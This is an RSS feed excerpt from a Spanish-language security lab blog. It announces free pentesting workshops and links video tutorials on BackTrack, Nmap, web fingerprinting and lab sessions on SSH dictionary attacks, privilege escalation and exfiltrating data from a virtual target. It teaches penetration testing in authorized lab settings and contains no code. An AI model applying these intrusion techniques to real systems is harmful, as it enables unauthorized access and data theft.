- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los Ambientes Virtuales de Intrusión en Linux</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-escaneo-e-identificacion-del-sistema">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Escaneo e identificación del Sistema</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; System Hacking</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Acceso a la Información Interna</a></p>
<p style="text-align: justify;"><strong>Fecha:</strong> Sabado 21 de Febrero de 2008<br />
<strong>Hora:</strong> 2:00 pm<br />
<strong>Lugar:</strong> Tecnosoft &#8211; Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10<br />
<strong>Cupos limitados:</strong> +/- 15 personas</p>
<p style="text-align: justify;"><strong>Repito:</strong> Solo pueden asistir las personas que confirmen asistencia (el proceso de confirmación consiste en que me envía la solicitud y yo le confirmo por e-mail la reserva de su cupo), Lo hago de esta manera para garantizar de que todos estén comodos y no tengan que ocupar un equipo por dos personas, o peor aún que vaya y no tenga reserva de cupo.<br />
Aclaro también y pongo a disposición sobre quienes tengan laptops personales y quieran llevarlo allá le hago el espacio y aprende con todos.<br />
Les recuerdo nuevamente que estos HackLabs no tienen ningún costo.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-08-medellin-pentest-repeticion/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Video Tutorial de Instalación de BackTrack 4 Beta</title>
		<link>http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-4-beta</link>
		<comments>http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-4-beta#comments</comments>
		<pubDate>Fri, 13 Feb 2009 21:45:28 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Recursos / Libros / Documentos]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=578</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>El siguiente video tutorial muestra el proceso necesario para llevar a cabo la instalación de la nueva versión de BackTrack en su fase beta en el disco duro de una PC.</p>
<p><strong><a href="http://www.4shared.com/file/87539628/15bd95a5/Instalacin_BackTrack_4_Beta_LabsDragonJARorg.html">Descargar video tutorial de instalación de BackTrack 4 Beta en el disco duro</a></strong> (<strong>Password:</strong> www.dragonjar.org)</p>
<p>Recuerda estudiar los diferentes recursos publicados relacionados con la distribución <strong><a href="http://labs.dragonjar.org/category/backtrack">BackTrack</a></strong> y los Test de Penetración.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-4-beta/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>HackTaller 07 Medellín &#8211; PenTest</title>
		<link>http://labs.dragonjar.org/hacktaller-07-medellin-pentest</link>
		<comments>http://labs.dragonjar.org/hacktaller-07-medellin-pentest#comments</comments>
		<pubDate>Thu, 12 Feb 2009 19:09:48 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=560</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Extiendo la invitación a todos los interesados en participar de este 7° HackTaller a desarrollarse en la ciudad de Medellín.</p>
<p>La temática para este HackLab será nuevamente Test de Penetración, pero está vez profundizando aún más en la dificultad del entorno de pruebas.</p>
<p>El escenario propuesto para este Test de Penetración es el siguiente:</p>
<p>Una compañía te contrata para identificar las vulnerabilidades que se encuentran en una de las redes (192.168.2.xxx). Los hosts dentro de la red no son sistemas críticos y además recientemente se han hecho copias de seguridad que además han sido verificadas, por lo tanto no hay problema sobre cualquier daño que pueda ocurrir. La organización ha tenido multiples administradores encargados de la red en los últimos dos años, y estan inseguros de las capacidades del anterior (o actual) personal.</p>
<p>Nuevamente se harán algunas definiciones necesarias y relacionadas en lo que yo llamo el arte de los Test de Penetración, para realizar de manera guiada el mismo.</p>
<p>El proceso de inscripción será igual a los anteriores. Los interesados deben enviarme un correo electrónico solicitando un cupo para el hacklab, el proceso de inscripción se completa, luego de que yo responda este e-mail confirmandole la disponiblidad del espacio.</p>
<p><strong>4v4t4r @ gmail . com</strong></p>
<p>Todos las personas que alcancen a tener un cupo deben llevar algunos materiales indispensables para el Test de Penetración.</p>
<p>- Imágen de BackTrack 3 para máquina virtual. Este archivo puede ser descargado de manera directa desde el siguiente enlace. (<a href="http://174.36.1.2/bt3.7z">Descargar imágen de máquina virtual BackTrack 3</a>)<br />
- Dispositivo de almacenamiento (preferiblemente superior a 2 gigas)<br />
- Cuaderno de notas<br />
- Comida para el profesor (papitas, chitos, gudis, rondallas, trocitos, café, etc, etc&#8230;)<br />
- Muy buena disposición de aprendizaje y enseñanza (pues la idea es retroalimentarnos con experiencias propias)<br />
- Desarrollar y/o visualizar los laboratorios realizados sobre Test de Penetración. Es muy necesario que vean y comprendan sobre los temas que ya se han tratado, pongo a continuación los videos de los trabajos realizados:</p>
<p>- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración 1</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los ambientes virtuales de intrusión en Windows</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los Ambientes Virtuales de Intrusión en Linux</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-escaneo-e-identificacion-del-sistema">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Escaneo e identificación del Sistema</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; System Hacking</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Acceso a la Información Interna</a></p>
<p><strong>Fecha:</strong> Sabado 14 de Fecbrero de 2008<br />
<strong>Hora:</strong> 2:00 pm<br />
<strong>Lugar:</strong> Tecnosoft &#8211; Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10<br />
<strong>Cupos limitados:</strong> +/- 15 personas</p>
<p><strong>Repito:</strong> Solo pueden asistir las personas que confirmen asistencia (el proceso de confirmación consiste en que me envía la solicitud y yo le confirmo por e-mail la reserva de su cupo), Lo hago de esta manera para garantizar de que todos estén comodos y no tengan que ocupar un equipo por dos personas, o peor aún que vaya y no tenga reserva de cupo.<br />
Aclaro también y pongo a disposición sobre quienes tengan laptops personales y quieran llevarlo allá le hago el espacio y aprende con todos.<br />
Les recuerdo nuevamente que estos HackLabs no tienen ningún costo&#8230; ya el que me quiera llevar cositas no me enojo XD.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-07-medellin-pentest/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Acceso a la Información Interna</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna#comments</comments>
		<pubDate>Tue, 20 Jan 2009 20:03:55 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[OpenSSL]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=528</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Luego de haber conseguido los diferentes datos de inicio de sesión de los usuarios en el sistema, procederemos a analizar y acceder la información crítica del sistema objetivo. Esto es necesario como PenTesters, pues vuelvo y repito, la finalidad de cada Test de Penetración es demostrar que tan vulnerable es el sistema, y que tan expuesto puede estar frente a los ataques de los delincuentes informáticos.</p>
<div align="center"><img alt="" src="http://img407.imageshack.us/img407/1382/openssldp4.jpg" title="OpenSSL" class="aligncenter" width="400" height="348" /></div>
<p>En el siguiente video tutorial veremos como accedemos al sistemas con los datos obtenidos, veremos además como recolectamos la información sensible del mismo, como la podemos descifrar y como modificamos el archivo de configuración del servidor FTP para transferir los datos.<br />
<span id="more-528"></span><br />
Con esta sesión damos por terminado el &#8220;resumen&#8221; de los laboratorios 5 y 6 realizados en la ciudad de Medellín, y al Laboratorio Virtual relizado en el pasado mes de diciembre. Solo bastará otro post a modo de conclusiones sobre el mismo y la invitación a que participen en los próximos <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><embed src="http://blip.tv/play/Ae3kDpSMLg" type="application/x-shockwave-flash" width="530" height="400" allowscriptaccess="always" allowfullscreen="true"></embed> </p>
<p><strong><a href="http://www.4shared.com/file/81634127/976301f8/PenTest5_LabsDragonJARorg.html ">Descargar video tutorial Test de Penetración &#8211; Acceso a la Información sensible</a></strong> (<strong>Password: </strong>www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; System Hacking</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking#comments</comments>
		<pubDate>Sun, 18 Jan 2009 19:24:05 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Entorno Virtualizado de Intrusión]]></category>
		<category><![CDATA[John The Ripper]]></category>
		<category><![CDATA[Laboratorio de seguridad informática]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Passwords]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Shadow]]></category>
		<category><![CDATA[SSH]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[virtualización]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=525</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Una vez recolectada toda la información del sistema (servicios, versiones, S.O, etc) y luego de haber realizado algunos intentos de conexión sobre ellos podemos perfilar algunos puntos de intrusión en el Sistema.</p>
<div align="center"><img alt="" src="http://img147.imageshack.us/img147/8812/xhydrazg7.jpg" title="Xhydra-PenTest" class="aligncenter" width="400" height="394" /></div>
<p>Sin lugar a dudas el servicio de SSHD &#8211; Secure Shell Daemon es el más opcionado para ser nuestro primer objetivo.<br />
<span id="more-525"></span><br />
En el siguiente video tutorial veremos como recolectamos información sensible de la compañía desde la propia página Web, además como hacemos uso de esa misma información para llevar a cabo un ataque basado en diccionario al servicio SSH.<br />
Luego veremos como con base a la información y la interacción con el sistema se hace necesario escalar privilegios en el mismo. Todo esto y más en el video tutorial.</p>
<p><embed src="http://blip.tv/play/Ae3kSJSMLg" type="application/x-shockwave-flash" width="530" height="400" allowscriptaccess="always" allowfullscreen="true"></embed> </p>
<p><strong><a href="http://www.4shared.com/file/81287772/6007a169/PenTest4_LabsDragonJARorg.html">Descargar video tutorial de Test de Penetración &#8211; System Hacking</a></strong> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Video tutorial: Introducción a Nmap</title>
		<link>http://labs.dragonjar.org/video-tutorial-introduccion-a-nmap</link>
		<comments>http://labs.dragonjar.org/video-tutorial-introduccion-a-nmap#comments</comments>
		<pubDate>Wed, 31 Dec 2008 02:45:29 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Recursos / Libros / Documentos]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[Video Tutorial]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=491</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>Video disponible en el proyecto <a href="http://www.sec-track.com/video-tutorial-introduccion-a-nmap" target="_blank">Sec-Track</a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/video-tutorial-introduccion-a-nmap/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Laboratorio Virtual: Test de Penetración 1 (Introducción y Desarrollo)</title>
		<link>http://labs.dragonjar.org/laboratorio-virtual-test-de-penetracion-1-introduccion-y-desarrollo</link>
		<comments>http://labs.dragonjar.org/laboratorio-virtual-test-de-penetracion-1-introduccion-y-desarrollo#comments</comments>
		<pubDate>Thu, 18 Dec 2008 20:38:43 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Entorno Virtualizado de Intrusión]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=488</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">&#8220;Hace días venía madurando la posibilidad de ofrecer los mismos laboratorios que vengo desarrollando en la ciudad de Medellín pero en modo virtual:<br />
<a href="http://anonym-url.com/go.php?to=http://labs.dragonjar.org/desarrollo-del-laboratorio-de-informatica-forense-en-medellin" target="_blank"><strong>Desarrollo del Laboratorio de Informática Forense en Medellín</strong></a><br />
<a href="http://anonym-url.com/go.php?to=http://labs.dragonjar.org/desarrollo-del-hacktaller-05-medellin-fotografias" target="_blank"><strong>Desarrollo del HackTaller 05 Medellín &#8211; Fotografías</strong></a><br />
<a href="http://anonym-url.com/go.php?to=http://labs.dragonjar.org/desarrollo-del-hacktaller-06-en-medellin-fotografias-y-escenario-propuesto" target="_blank"><strong>Desarrollo del HackTaller 06 en Medellín &#8211; Fotografías y Escenario propuesto</strong></a>&#8221;</p>
<p style="text-align: justify;">Este será llevado a cabo el próximo sabado 20 de diciembre &#8211; 2:00 PM To 4:00 PM (GMT-05:00) Eastern Time (US &amp; Canada)</p>
<p>Los interesados deben enviarme un correo electrónico, al cual yo responderé con el enlace al salón virtual.</p>
<p>4v4t4r @ gmail . com</p>
<p style="text-align: justify;"><span id="more-488"></span>La temática para este primer laboratorio virtual es la siguiente:</p>
<p><strong>Test de Penetración 1 (Introducción y Desarrollo)</strong></p>
<p>La finalidad de este primer Laboratorio virtual de Test de Penetración, será el ofrecer las técnicas, procesos y procedimientos necesarios para llevar a cabo un Test de Penetración haciendo uso de la Multi-Herramienta BackTrack.</p>
<p>Esto conllevará entonces a aprender y prácticar con ejemplos claros, sobre el uso de esta máginifica distribución. Además de las metodologías necesarias en un Test de Penetración.</p>
<p><strong>Escenario propuesto:</strong></p>
<p>El escenario para este Laboratorio es el de un CEO de una pequeña empresa que ha sido presionado por el Comité Administrativo para ser objeto de un Test de Penetración a realizarse desde la empresa. El Director General afirma que su empresa es segura, cree además de que este Test de Penetración será un enorme desperdicio de dinero, sobre todo porque ya tiene una solución de exploración (escaneo) de vulnerabilidades (Nessus). Para hacer “felices” a los del Comité Administrativo, él decide contratarlo a usted y le dá un plazo de 5 días para realizar el trabajo, pues como se mencionó él no cree que la empresa sea vulnerable a cualquier intento de acceso no autorizado.<br />
Su tarea es analizar solo un servidor en el cual se aloja una página Web que ofrece información de contacto de la misma.</p>
<p>El Director General espera que usted intente con todos los tipos de ataques que estén a su disposición, pues está seguro de que usted no podrá vulnerar el sistema y obtener acceso.<br />
Demostrar que el sistema es vulnerable sería la mejor manera de concientizar al Director General, para desde allí implementar mejores prácticas en materia de seguridad Informática.<br />
&#8212;&#8212;&#8212;-</p>
<p>De esta manera hago la invitación a todos los interesados en participar. No existe entonces la limitación geográfica que muchos usuarios presentan <img src="http://comunidad.dragonjar.org/Smileys/default/smiley.gif" border="0" alt="Sonrisa" />.</p>
<p style="text-align: justify;">Por ahora y como vieron en la descripción se hace necesario tener la distribución BackTrack.</p>
<p>La idea entonces es que descarguen la imágen y la configuren en una máquina virtual (VMWare Player / WorkStation / Server).<br />
Como sugerencia personal preferiría que descargaran la siguiente máquina virtual ya creada, con las vmware tools instaladas y lista para ser usada.</p>
<p><a href="http://anonym-url.com/go.php?to=http://174.36.1.2/bt3.7z" target="_blank"><strong>Descargar Máquina Virtual BackTrack 3</strong></a> (Desarrollada por <a href="http://anonym-url.com/go.php?to=http://bagside.com/bagvapp/index.html" target="_blank"><strong>Bagside</strong></a>)</p>
<p style="text-align: justify;">Ahora publico el sistema que será objeto del Test de Penetración.</p>
<p><a href="http://anonym-url.com/go.php?to=http://www.sendspace.com/file/hglz1o" target="_blank"><strong>Descargar imágen de Entorno Virtualizado de Intrusion +/- 195Mb</strong></a></p>
<p>La idea es que vayan leyendo los enlaces que publiqué anteriormente, además pueden ir descomprimiendo la máquina virtual BackTrack (+/- 1.5Gb).<br />
Recuerden además que este laboratorio será desarrollado en cualquiera de los productos VMWare (WorkStation, Player, Server), aunque de todas maneras mostraré como puede configurarse en Qemu. Así que por lo tanto deben tener instalado cualquiera de esos productos (preferiblemente VMWare WorkStation).</p>
<p>El laboratorio promete, así que espero no se lo pierdan, mucho menos las personas de otras ciudades y paises que han querido participar en los Hack Labs que realizo en mi ciudad.</p>
<p>Para ese día deben tener un buen sistema de sonido (ej. diadema o audífonos, para poder recepcionar bien el audio).<br />
Espero además que tengan una buena conexión a internet, pues algunos recursos así lo requieren.</p>
<p>Aún sigo esperando los correos electrónicos de las personas que estén interesadas, hasta el momento solo he recibido 8 correos, y solo puede ser transmitida la invitación por ese medio.<br />
De la buena asistencia depende de que continúe o no con la realización y publicación de los mismos <img src="http://comunidad.dragonjar.org/Smileys/default/wink.gif" border="0" alt="Gi&amp;ntilde;ar" /></p>
<p><strong>Textos e información de interés:</strong></p>
<p><a href="../descubrimiento-de-aplicaciones-nmap" target="_blank">http://labs.dragonjar.org/descubrimiento-de-aplicaciones-nmap</a><br />
<a href="../video-tutorial-de-instalacion-de-backtrack-3" target="_blank">http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-3</a><br />
<a href="../test-de-penetracion-con-backtrack-netcat" target="_blank">http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat</a><br />
<a href="../test-de-penetracion-con-backtrack-servicios-basicos" target="_blank">http://labs.dragonjar.org/test-de-penetracion-con-backtrack-servicios-basicos</a><br />
<a href="../test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank">http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-i" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-i</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-ii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-ii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-enumeracion-del-objetivo-ii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-enumeracion-del-objetivo-ii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-i" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-i</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-ii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-ii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-iii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-iii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-i" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-i</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-iii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-iii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-v" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-v</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-vi" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-vi</a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/laboratorio-virtual-test-de-penetracion-1-introduccion-y-desarrollo/feed</wfw:commentRss>
		<slash:comments>28</slash:comments>
		</item>
		<item>
		<title>Labs OWASP: Descubrimiento de aplicaciones, Nmap</title>
		<link>http://labs.dragonjar.org/descubrimiento-de-aplicaciones-nmap</link>
		<comments>http://labs.dragonjar.org/descubrimiento-de-aplicaciones-nmap#comments</comments>
		<pubDate>Tue, 09 Dec 2008 17:32:16 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[OWASP]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Nmap]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=437</guid>
		<description><![CDATA[<img src="http://img510.imageshack.us/img510/6351/owasplogo1si5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Encontrar que aplicaciones específicas se encuentran instaladas en un servidor web es un elemento esencial en un test de vulnerabilidades de una aplicación web.</p>
<p style="text-align: center;"><img class="aligncenter" title="Nmap" src="http://img385.imageshack.us/img385/3139/nmapqf2.jpg" alt="" width="450" height="464" /></p>
<p style="text-align: justify;">Muchas aplicaciones tienen vulnerabilidades y estrategias de ataque conocidas, que pueden ser explotadas para conseguir control remoto o explotación de los datos de la aplicación.</p>
<p style="text-align: justify;">Además, muchas aplicaciones están a menudo mal configuradas o sin actualizar, debido a la impresión de que solo se usan &#8220;internamente&#8221;, y por tanto no representan ninguna amenaza.</p>
<p style="text-align: justify;"><span id="more-437"></span>Con la proliferación de servidores web virtuales, la tradicional relación de una dirección IP con un servidor web 1 a 1 ha ido perdiendo su significado original. No es nada raro tener múltiples sites y aplicaciones web cuyos nombres resuelvan a la misma dirección IP (este escenario no se limita a entornos de hosting, también aplica a entornos corporativos).</p>
<p style="text-align: justify;"><strong>Nmap:</strong></p>
<p style="text-align: justify;">Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos TCP y UDP atribuido a Fyodor. Se usa para evaluar la seguridad de sistemas informáticos, así como para descubrir servicios o servidores en una red informática. (<a href="http://labs.dragonjar.org/herramienta-nmap" target="_blank"><strong>Más información&#8230;</strong></a>)</p>
<p style="text-align: justify;">El siguiente video tutorial muestra el proceso de descubrimiento básico de aplicaciones con Nmap.</p>
<p style="text-align: center;"><script src="http://en.sevenload.com/pl/rdbc3xU/445x364" type="text/javascript"></script></p>
<p>Link: <a href="http://en.sevenload.com/videos/rdbc3xU-Labs-OWASP-Descubrimiento-de-aplicaciones-Nmap"><img src="http://static.sevenload.com/img/sevenload.png" alt="Labs OWASP: Descubrimiento de aplicaciones, Nmap" width="66" height="10" /></a></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/75206777/b5ce4ffd/Descubirimiento_nmap_LabsDragonJARorg.html " target="_blank"><strong>Descargar video tutorial de descubrimiento de aplicaciones con Nmap</strong></a> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/descubrimiento-de-aplicaciones-nmap/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Labs OWASP: Pruebas de firma digital de aplicaciones Web, netcat, Httprint, Live HTTP headers y Test Online</title>
		<link>http://labs.dragonjar.org/pruebas-de-firma-digital-de-aplicaciones-web-netcat-httprint-live-http-headers-y-test-online</link>
		<comments>http://labs.dragonjar.org/pruebas-de-firma-digital-de-aplicaciones-web-netcat-httprint-live-http-headers-y-test-online#comments</comments>
		<pubDate>Tue, 09 Dec 2008 16:50:33 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[OWASP]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Httprint]]></category>
		<category><![CDATA[live http headers]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Netcat]]></category>
		<category><![CDATA[netcraft]]></category>
		<category><![CDATA[Seguridad Web]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=429</guid>
		<description><![CDATA[<img src="http://img510.imageshack.us/img510/6351/owasplogo1si5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">La obtención de la firma digital de un servidor web es una tarea esencial para la persona que realiza una prueba de intrusión. Saber el tipo y versión del servidor en ejecución le permite determinar vulnerabilidades conocidas, y los exploits apropiados a usar durante la prueba.</p>
<p style="text-align: center;"><a href="http://img123.imageshack.us/img123/8757/capsfirmawebns3.jpg"><img class="aligncenter" title="httprint" src="http://img361.imageshack.us/img361/5563/httprinthe6.jpg" alt="" width="450" height="307" /></a></p>
<p style="text-align: justify;">Actualmente existen multitud de vendedores y de versiones de servidores web en el mercado. Saber el tipo exacto de servidor que estás comprobando ayuda considerablemente en el proceso de testing, y puede cambiar el curso de las pruebas. Esta información puede inferirse mediante el envío de comandos específicos al servidor web y posteriormente analizar su respuesta, ya que cada versión del software de servidor web puede responder de forma diferente a un mismo comando. Sabiendo la respuesta de cada tipo de servidor web ante comandos específicos y almacenando dicha información en una base de datos de firmas web, la persona a cargo de las pruebas de intrusión, puede enviar esos comandos al servidor web, analizar la respuesta y compararla a la base de datos de firmas conocidas.</p>
<p style="text-align: justify;"><span id="more-429"></span>La forma más básica y sencilla de identificar un servidor Web es comprobar el campo Server en la cabecera de respuesta HTTP.</p>
<p style="text-align: justify;">Encontrar que aplicaciones específicas se encuentran instaladas en un servidor web es un elemento esencial en un test de vulnerabilidades de una aplicación web. Muchas aplicaciones tienen vulnerabilidades y estrategias de ataque conocidas, que pueden ser explotadas para conseguir control remoto o explotación de los datos de la aplicación. Además, muchas aplicaciones están a menudo mal configuradas o sin actualizar, debido a la impresión de que solo se usan &#8220;internamente&#8221;, y por tanto no representan ninguna amenaza.</p>
